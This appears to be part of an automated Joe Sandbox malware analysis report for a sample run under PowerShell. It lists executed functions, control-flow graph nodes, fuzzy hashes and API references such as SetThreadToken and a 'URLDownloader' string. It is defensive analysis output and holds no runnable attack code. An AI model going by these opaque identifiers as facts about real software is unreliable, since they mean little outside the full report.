                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                  • String ID: URLDownloader
                                                                                                  • API String ID: 17069307-1891997712
                                                                                                  • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                  • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                                  • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                  • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:3
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 20890 8496428 20891 849646b SetThreadToken 20890->20891 20892 8496499 20891->20892

                                                                                                  Executed Functions

                                                                                                  Function 044BB470 Relevance: .3, Instructions: 266COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 625 44bb470-44bb4a9 627 44bb4ab 625->627 628 44bb4ae-44bb7e9 call 44bacbc 625->628 627->628 689 44bb7ee-44bb7f5 628->689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e027ffa036cefa394de507a71af34a5ec5eb46c05e1a99f8a33ddf834f3d0eef
                                                                                                  • Instruction ID: b9fef6662d843ff6804efd60ade10e40aeb6f796d97323337e972a3ffaf00395
                                                                                                  • Opcode Fuzzy Hash: e027ffa036cefa394de507a71af34a5ec5eb46c05e1a99f8a33ddf834f3d0eef
                                                                                                  • Instruction Fuzzy Hash: 5C918471A01654AFEB19EFB888105AF7BF2EF84B10B00C91DD546AB740DF346D069BE5
                                                                                                  Function 044BB490 Relevance: .3, Instructions: 252COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 690 44bb490-44bb4a9 691 44bb4ab 690->691 692 44bb4ae-44bb7e9 call 44bacbc 690->692 691->692 753 44bb7ee-44bb7f5 692->753
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e9c40606afb28dd1a05d3f0ff831a2d625aaf7d48dac0ffc36bc484c67f63ee7
                                                                                                  • Instruction ID: 68298f266d573a722c9b276bca9132493b98c9288f7d24b0e721e0fd5aff863b
                                                                                                  • Opcode Fuzzy Hash: e9c40606afb28dd1a05d3f0ff831a2d625aaf7d48dac0ffc36bc484c67f63ee7
                                                                                                  • Instruction Fuzzy Hash: 76914171A01618AFEF59EBB884105AF7BF2EF84B10B00C91DD506AB740DF346D069BE5
                                                                                                  Function 07332308 Relevance: 8.1, Strings: 6, Instructions: 648COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: pibk$pibk$pibk$pibk$pibk$|,dk
                                                                                                  • API String ID: 0-2914658708
                                                                                                  • Opcode ID: ff0b6dad33c690c4ad1eedd2636f4602c26d1dc361114662c9a52e3a28ce0eba
                                                                                                  • Instruction ID: 17fe850eba1e28973d6630451067f0930ce699b31223234837c876977f981af6
                                                                                                  • Opcode Fuzzy Hash: ff0b6dad33c690c4ad1eedd2636f4602c26d1dc361114662c9a52e3a28ce0eba
                                                                                                  • Instruction Fuzzy Hash: A82213B5B00316DFFB358FA988407ABB7E5BF85211F1480AAE9099B251DF35CD41CBA1
                                                                                                  Function 08496421 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 200 8496421-8496463 202 849646b-8496497 SetThreadToken 200->202 203 8496499-849649f 202->203 204 84964a0-84964bd 202->204 203->204
                                                                                                  APIs
                                                                                                  • SetThreadToken.KERNELBASE(EFD807F3), ref: 0849648A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1365410846.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8490000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ThreadToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254676861-0
                                                                                                  • Opcode ID: 4c3fd551c59466669687902101ec6545b537284fdb66ee5fda64711e7b30f728
                                                                                                  • Instruction ID: c2f5a7fb422c797764c539083d7046b822829f75521f5923eccb3d94b2bb834e
                                                                                                  • Opcode Fuzzy Hash: 4c3fd551c59466669687902101ec6545b537284fdb66ee5fda64711e7b30f728
                                                                                                  • Instruction Fuzzy Hash: EA1116B59006488FDB10DF9AD845BDEFBF8EB88324F14842AD458A7350C774A944CFA5
                                                                                                  Function 08496428 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 207 8496428-8496497 SetThreadToken 209 8496499-849649f 207->209 210 84964a0-84964bd 207->210 209->210
                                                                                                  APIs
                                                                                                  • SetThreadToken.KERNELBASE(EFD807F3), ref: 0849648A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1365410846.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8490000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ThreadToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254676861-0
                                                                                                  • Opcode ID: 6d41e8e4c873de1ce70f6aaa49a918b9dd61b00d108a4857aa3921b9aed3137a
                                                                                                  • Instruction ID: 62837b770f9a67d21002eca3e62406d953e57c408fa05fdc331f6958e019924c
                                                                                                  • Opcode Fuzzy Hash: 6d41e8e4c873de1ce70f6aaa49a918b9dd61b00d108a4857aa3921b9aed3137a
                                                                                                  • Instruction Fuzzy Hash: 2C1106B59007488FDB10DF9AC844BDEFBF8EB88324F14842AD458A7350C774A944CFA5
                                                                                                  Function 07333CE8 Relevance: .6, Instructions: 585COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 350 7333ce8-7333d0d 351 7333d13-7333d18 350->351 352 7333f00-7333f20 350->352 353 7333d30-7333d34 351->353 354 7333d1a-7333d20 351->354 360 7333f22-7333f4a 352->360 361 7333f75-7333f79 352->361 358 7333eb0-7333eba 353->358 359 7333d3a-7333d3c 353->359 356 7333d22 354->356 357 7333d24-7333d2e 354->357 356->353 357->353 362 7333ec8-7333ece 358->362 363 7333ebc-7333ec5 358->363 364 7333d3e-7333d4a 359->364 365 7333d4c 359->365 369 7333f50-7333f55 360->369 370 73340ce-73340ec 360->370 367 7333f7b-7333f87 361->367 368 7333f89 361->368 371 7333ed0-7333ed2 362->371 372 7333ed4-7333ee0 362->372 366 7333d4e-7333d50 364->366 365->366 366->358 374 7333d56-7333d75 366->374 375 7333f8b-7333f8d 367->375 368->375 376 7333f57-7333f5d 369->376 377 7333f6d-7333f71 369->377 385 73340ee-7334112 370->385 386 733407c-733407d 370->386 378 7333ee2-7333efd 371->378 372->378 405 7333d77-7333d83 374->405 406 7333d85 374->406 379 7334080-733408a 375->379 380 7333f93-7333fb2 375->380 381 7333f61-7333f6b 376->381 382 7333f5f 376->382 377->361 377->379 387 7334097-733409d 379->387 388 733408c-7334094 379->388 416 7333fc2 380->416 417 7333fb4-7333fc0 380->417 381->377 382->377 391 7334228-733425d 385->391 392 7334118-733411d 385->392 393 73340a3-73340af 387->393 394 733409f-73340a1 387->394 414 733428b-7334295 391->414 415 733425f-7334281 391->415 397 7334135-7334139 392->397 398 733411f-7334125 392->398 400 73340b1-73340cb 393->400 394->400 407 73341da-73341e4 397->407 408 733413f-7334141 397->408 402 7334127 398->402 403 7334129-7334133 398->403 402->397 403->397 411 7333d87-7333d89 405->411 406->411 419 73341f1-73341f7 407->419 420 73341e6-73341ee 407->420 412 7334143-733414f 408->412 413 7334151 408->413 411->358 424 7333d8f-7333d96 411->424 425 7334153-7334155 412->425 413->425 421 7334297-733429c 414->421 422 733429f-73342a5 414->422 458 7334283-7334288 415->458 459 73342d5-73342fe 415->459 426 7333fc4-7333fc6 416->426 417->426 427 73341f9-73341fb 419->427 428 73341fd-7334209 419->428 429 73342a7-73342a9 422->429 430 73342ab-73342b7 422->430 424->352 432 7333d9c-7333da1 424->432 425->407 433 733415b-733415d 425->433 426->379 434 7333fcc-7334003 426->434 436 733420b-7334225 427->436 428->436 438 73342b9-73342d2 429->438 430->438 439 7333da3-7333da9 432->439 440 7333db9-7333dc8 432->440 441 7334177-733417e 433->441 442 733415f-7334165 433->442 470 7334005-733400b 434->470 471 733401d-7334024 434->471 448 7333dab 439->448 449 7333dad-7333db7 439->449 440->358 463 7333dce-7333dec 440->463 444 7334180-7334186 441->444 445 7334196-73341d7 441->445 450 7334167 442->450 451 7334169-7334175 442->451 454 733418a-7334194 444->454 455 7334188 444->455 448->440 449->440 450->441 451->441 454->445 455->445 473 7334300-7334326 459->473 474 733432d-733435c 459->474 463->358 480 7333df2-7333e17 463->480 475 733400f-733401b 470->475 476 733400d 470->476 478 7334026-733402c 471->478 479 733403c-733407b 471->479 473->474 491 7334395-733439f 474->491 492 733435e-733437b 474->492 475->471 476->471 481 7334030-733403a 478->481 482 733402e 478->482 479->386 480->358 496 7333e1d-7333e24 480->496 481->479 482->479 494 73343a1-73343a5 491->494 495 73343a8-73343ae 491->495 503 73343e5-73343ea 492->503 504 733437d-733438f 492->504 497 73343b0-73343b2 495->497 498 73343b4-73343c0 495->498 500 7333e26-7333e41 496->500 501 7333e6a-7333e9d 496->501 502 73343c2-73343e2 497->502 498->502 508 7333e43-7333e49 500->508 509 7333e5b-7333e5f 500->509 519 7333ea4-7333ead 501->519 503->504 504->491 512 7333e4b 508->512 513 7333e4d-7333e59 508->513 515 7333e66-7333e68 509->515 512->509 513->509 515->519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14ba97773e67251c5a74549f1a62e117021c78160c490eab3a01a87b128987c3
                                                                                                  • Instruction ID: d23f10c53fb306840abc719d95fef7d12daf338af0d6a2c0d827dc76132bb7a5
                                                                                                  • Opcode Fuzzy Hash: 14ba97773e67251c5a74549f1a62e117021c78160c490eab3a01a87b128987c3
                                                                                                  • Instruction Fuzzy Hash: BA1249B2B043459FEB359BA8980077ABBA6AFC1215F14C0BAD509DF251DF35CC52C7A2
                                                                                                  Function 044B29F0 Relevance: .2, Instructions: 210COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 754 44b29f0-44b2a1e 756 44b2af5-44b2b37 754->756 757 44b2a24-44b2a3a 754->757 761 44b2b3d-44b2b56 756->761 762 44b2c51-44b2c61 756->762 758 44b2a3f-44b2a52 757->758 759 44b2a3c 757->759 758->756 766 44b2a58-44b2a65 758->766 759->758 764 44b2b5b-44b2b69 761->764 765 44b2b58 761->765 764->762 772 44b2b6f-44b2b79 764->772 765->764 768 44b2a6a-44b2a7c 766->768 769 44b2a67 766->769 768->756 773 44b2a7e-44b2a88 768->773 769->768 774 44b2b7b-44b2b7d 772->774 775 44b2b87-44b2b94 772->775 777 44b2a8a-44b2a8c 773->777 778 44b2a96-44b2aa6 773->778 774->775 775->762 776 44b2b9a-44b2baa 775->776 779 44b2baf-44b2bbd 776->779 780 44b2bac 776->780 777->778 778->756 781 44b2aa8-44b2ab2 778->781 779->762 785 44b2bc3-44b2bd3 779->785 780->779 782 44b2ac0-44b2af4 781->782 783 44b2ab4-44b2ab6 781->783 783->782 787 44b2bd8-44b2be5 785->787 788 44b2bd5 785->788 787->762 791 44b2be7-44b2bf7 787->791 788->787 792 44b2bf9 791->792 793 44b2bfc-44b2c08 791->793 792->793 793->762 795 44b2c0a-44b2c24 793->795 796 44b2c29 795->796 797 44b2c26 795->797 798 44b2c2e-44b2c38 796->798 797->796 799 44b2c3d-44b2c50 798->799
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 27e1c50026f8a3f376f6e20c4b59dbf2fe9d5a0aff2580760530961ef4e35662
                                                                                                  • Instruction ID: 3ca6069426130b76a6ca7d4373b84ad7ffb7245f46276765a12811685485dc7c
                                                                                                  • Opcode Fuzzy Hash: 27e1c50026f8a3f376f6e20c4b59dbf2fe9d5a0aff2580760530961ef4e35662
                                                                                                  • Instruction Fuzzy Hash: E7917D74A00605CFCB15CF98C598AAEFBB1FF48310B24859AD855AB365C735FC51CBA0
                                                                                                  Function 044BBAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 935 44bbac0-44bbb50 939 44bbb52 935->939 940 44bbb56-44bbb61 935->940 939->940 941 44bbb63 940->941 942 44bbb66-44bbbc0 call 44baf98 940->942 941->942 949 44bbbc2-44bbbc7 942->949 950 44bbc11-44bbc15 942->950 949->950 951 44bbbc9-44bbbec 949->951 952 44bbc17-44bbc21 950->952 953 44bbc26 950->953 955 44bbbf2-44bbbfd 951->955 952->953 954 44bbc2b-44bbc2d 953->954 956 44bbc2f-44bbc50 954->956 957 44bbc52-44bbc55 call 44ba978 954->957 958 44bbbff-44bbc05 955->958 959 44bbc06-44bbc0f 955->959 962 44bbc5a-44bbc5e 956->962 957->962 958->959 959->954 964 44bbc60-44bbc89 962->964 965 44bbc97-44bbcc6 962->965 964->965
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 92ed3a2575cf3916079ba9d267398769d6cacd5eed2217d7be38aec6137c7df8
                                                                                                  • Instruction ID: 098f232d9163aaaeab7b791aea23589277ac64f26d1ce234c76f09e4d5ddd6d1
                                                                                                  • Opcode Fuzzy Hash: 92ed3a2575cf3916079ba9d267398769d6cacd5eed2217d7be38aec6137c7df8
                                                                                                  • Instruction Fuzzy Hash: 9961F471E01288DFDB15CFA9C5846DDBBF1EF88310F14812AE819AB754EB74AC41CBA0
                                                                                                  Function 044B7740 Relevance: .2, Instructions: 154COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 974 44b7740-44b7776 977 44b7778-44b777a 974->977 978 44b777f-44b7788 974->978 979 44b7829-44b782e 977->979 981 44b778a-44b778c 978->981 982 44b7791-44b77af 978->982 981->979 985 44b77b1-44b77b3 982->985 986 44b77b5-44b77b9 982->986 985->979 987 44b77bb-44b77c0 986->987 988 44b77c8-44b77cf 986->988 987->988 989 44b782f-44b7860 988->989 990 44b77d1-44b77fa 988->990 1000 44b78e2-44b78e6 989->1000 1001 44b7866-44b78bd 989->1001 993 44b7808 990->993 994 44b77fc-44b7806 990->994 996 44b780a-44b7816 993->996 994->996 1002 44b7818-44b781a 996->1002 1003 44b781c-44b7823 996->1003 1014 44b78e9 call 44b7932 1000->1014 1015 44b78e9 call 44b7940 1000->1015 1010 44b78c9-44b78d7 1001->1010 1011 44b78bf 1001->1011 1002->979 1003->979 1005 44b78ec-44b78f1 1010->1000 1013 44b78d9-44b78e1 1010->1013 1011->1010 1014->1005 1015->1005
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07e2d81ee5e5cdc715bc7e63c9f915d3be02d28ed12c1ea05d92bd69990e60cc
                                                                                                  • Instruction ID: d4fa9b4d71c628340b6f1265e8bc87a94b0fadb9236bc0ed3981b1c03db87c62
                                                                                                  • Opcode Fuzzy Hash: 07e2d81ee5e5cdc715bc7e63c9f915d3be02d28ed12c1ea05d92bd69990e60cc
                                                                                                  • Instruction Fuzzy Hash: C451BD313042059FEB14DBA5D854BAB77EAFFC8215F14856AD589DB391EB31EC02CBA0
                                                                                                  Function 044BBAB0 Relevance: .2, Instructions: 153COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1016 44bbab0-44bbb50 1022 44bbb52 1016->1022 1023 44bbb56-44bbb61 1016->1023 1022->1023 1024 44bbb63 1023->1024 1025 44bbb66-44bbbc0 call 44baf98 1023->1025 1024->1025 1032 44bbbc2-44bbbc7 1025->1032 1033 44bbc11-44bbc15 1025->1033 1032->1033 1034 44bbbc9-44bbbec 1032->1034 1035 44bbc17-44bbc21 1033->1035 1036 44bbc26 1033->1036 1038 44bbbf2-44bbbfd 1034->1038 1035->1036 1037 44bbc2b-44bbc2d 1036->1037 1039 44bbc2f-44bbc50 1037->1039 1040 44bbc52-44bbc55 call 44ba978 1037->1040 1041 44bbbff-44bbc05 1038->1041 1042 44bbc06-44bbc0f 1038->1042 1045 44bbc5a-44bbc5e 1039->1045 1040->1045 1041->1042 1042->1037 1047 44bbc60-44bbc89 1045->1047 1048 44bbc97-44bbcc6 1045->1048 1047->1048
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e29b642de6d89f3600c8e3bf1184f6c838bae430751564085b7b8ddce0d8418
                                                                                                  • Instruction ID: 0cef7e865805a47a96ad367b8cf451f3706a3335a6f74b07be9b7334b743b46d
                                                                                                  • Opcode Fuzzy Hash: 1e29b642de6d89f3600c8e3bf1184f6c838bae430751564085b7b8ddce0d8418
                                                                                                  • Instruction Fuzzy Hash: BC511871E01288DFDB15CFA9D484ADDBBF1EF88310F14802AE859AB754DB34AC45CBA0
                                                                                                  Function 07333CCC Relevance: .1, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c7093135b006dbe8a055dc5d71b70a0b81f34cf80d9cbf9fa4420855e1eaf74e
                                                                                                  • Instruction ID: 8b205d4b43f6ae68bf88cb28027e1aa282eb1c4f1f389a85cfc1c447afac7f4d
                                                                                                  • Opcode Fuzzy Hash: c7093135b006dbe8a055dc5d71b70a0b81f34cf80d9cbf9fa4420855e1eaf74e
                                                                                                  • Instruction Fuzzy Hash: 0F4117F2B042028FEB358F54C9006AAB7B6AF84255F18C1A5D9099F355CB39ED46CBA1
                                                                                                  Function 044B6FE0 Relevance: .1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 88e532d00c71f6cd0b9e8f4c6751654d557d22b352938ec4e0d6c130fa5277b0
                                                                                                  • Instruction ID: 7cdbad4d334058697a66186dd43e74c11a0d51f322e3e1c3d6b8ea332e09acf9
                                                                                                  • Opcode Fuzzy Hash: 88e532d00c71f6cd0b9e8f4c6751654d557d22b352938ec4e0d6c130fa5277b0
                                                                                                  • Instruction Fuzzy Hash: 2E414A34B046058FDB18DFA4C458AAEBBF2EF8D311F14509AD446AB391DB35EC02CBA0
                                                                                                  Function 044B2B00 Relevance: .1, Instructions: 109COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c96d97cd8840c3b4a53f42070877f6bc89b1e251a98a9da007e4669133c83b6a
                                                                                                  • Instruction ID: 6e9169b120d25f21d1d00ef9a0448e7799a092cd5f766dbe364a784f4b9aa0b7
                                                                                                  • Opcode Fuzzy Hash: c96d97cd8840c3b4a53f42070877f6bc89b1e251a98a9da007e4669133c83b6a
                                                                                                  • Instruction Fuzzy Hash: A3414C74A006059FCB0ACF58C598AEEF7B1FF48310B15859AD856AB364C776FC51CBA0
                                                                                                  Function 044BC388 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cda89a0f6b996f087265308649d7be1fa257a0bd9929a408ca48633a5d97001d
                                                                                                  • Instruction ID: 25ff9a8ccb6f5ca9a3a1b944352bbb08636b5d24ed79c6f76b520913bc746829
                                                                                                  • Opcode Fuzzy Hash: cda89a0f6b996f087265308649d7be1fa257a0bd9929a408ca48633a5d97001d
                                                                                                  • Instruction Fuzzy Hash: 92319E313002009FE715EB79D894B9AB792FFC4214F148229D60ACB350DF71E846CBA1
                                                                                                  Function 044B6FD1 Relevance: .1, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 288e874d0f6c1d74ffb166b37a044cfb7e66f74a8206900e9d0ff65d1c0abd35
                                                                                                  • Instruction ID: 0b67b7847d8b2fd41b6ba2ab7361b279d6c81f1e9ab94149242b8178a335d3e4
                                                                                                  • Opcode Fuzzy Hash: 288e874d0f6c1d74ffb166b37a044cfb7e66f74a8206900e9d0ff65d1c0abd35
                                                                                                  • Instruction Fuzzy Hash: 01310A34A006158FDB14CFA8C598AAEBBF2EF8D311F14909AD446AB351DB31EC41CB60
                                                                                                  Function 044BAE60 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b279e89a5a60a7ab03e917a5fc4c3f7ab1b546bbc95f74b18bb2f01fa82473c9
                                                                                                  • Instruction ID: 53f9665b8996cdcfe253a0096b19233675e5098f6d4fab0ba58615cfe09c17ee
                                                                                                  • Opcode Fuzzy Hash: b279e89a5a60a7ab03e917a5fc4c3f7ab1b546bbc95f74b18bb2f01fa82473c9
                                                                                                  • Instruction Fuzzy Hash: 08312B74A016099BEF14DFB9D4957EEBBF6EF88310F14802AE415EB350EB749C418BA1
                                                                                                  Function 044BAD28 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f6bbc472b4992ffe2b7422d9f424f26cf07786046d67dfd0998f4ea236e3c60e
                                                                                                  • Instruction ID: ad683d9cc8c75634839c043add42590e0998ee2c8fd6e98493851985eab9226f
                                                                                                  • Opcode Fuzzy Hash: f6bbc472b4992ffe2b7422d9f424f26cf07786046d67dfd0998f4ea236e3c60e
                                                                                                  • Instruction Fuzzy Hash: 50318474A042489FEB00DBA4D855AFE7BB2EF84304F11846AD511AB395DF78AD41CBA1
                                                                                                  Function 044BE049 Relevance: .1, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b1dac630ab1580459494d6a4a1a3cf40adddb3652b2b1adb6738545125778852
                                                                                                  • Instruction ID: 0dc5de850408eda1b958985285cf308e78da96324a11c5b041269ea5818bc339
                                                                                                  • Opcode Fuzzy Hash: b1dac630ab1580459494d6a4a1a3cf40adddb3652b2b1adb6738545125778852
                                                                                                  • Instruction Fuzzy Hash: 8D314D71A002048FDB14DF68D4546EEBBF6EF8C315F14816AD806E73A0DB35AC81CBA1
                                                                                                  Function 044BAE70 Relevance: .1, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
